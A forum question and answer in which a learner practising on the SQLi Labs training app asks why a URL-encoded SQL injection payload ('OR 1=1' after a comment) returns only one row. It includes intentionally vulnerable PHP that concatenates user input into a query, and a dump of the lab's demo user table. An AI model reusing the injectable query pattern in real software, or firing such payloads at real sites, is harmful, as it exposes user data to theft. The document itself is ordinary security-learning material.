I am learning some SQL injection basics. I have a vulnerable application (SQLi Labs), so I can see the source code and trying to figure out how the URL should be parameterized to give back the same result as the mysql interface does. However there is a difference which I can not solve, so please help me.
This is the PHP code:
$sql="SELECT * FROM users WHERE id='$id'";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
This is the mysql query:
mysql> select * from users where id=3--'' OR 1=1;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
This is the URL:
http://192.168.19.155/sqli-labs/Less-1/?id=2--%20%27%27%20OR%201=1
The URL gives me back only one row (which was defined in "?id=2" option) the rest of the query (--%20%27%27%20OR%201=1) is seems to be ignored.
The URL query should give back the whole users table as the mysql interface does. There is no input filtering, so I can not understand why the URL result does not equal to the mysql interface output. Please help me!
Thank you! Erik
Actually, mysql_fetch_array
returns information about only one row. You can modify script to get expected response such a way:
while ($row = mysql_fetch_array($result)) {
print_r($row);
}
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.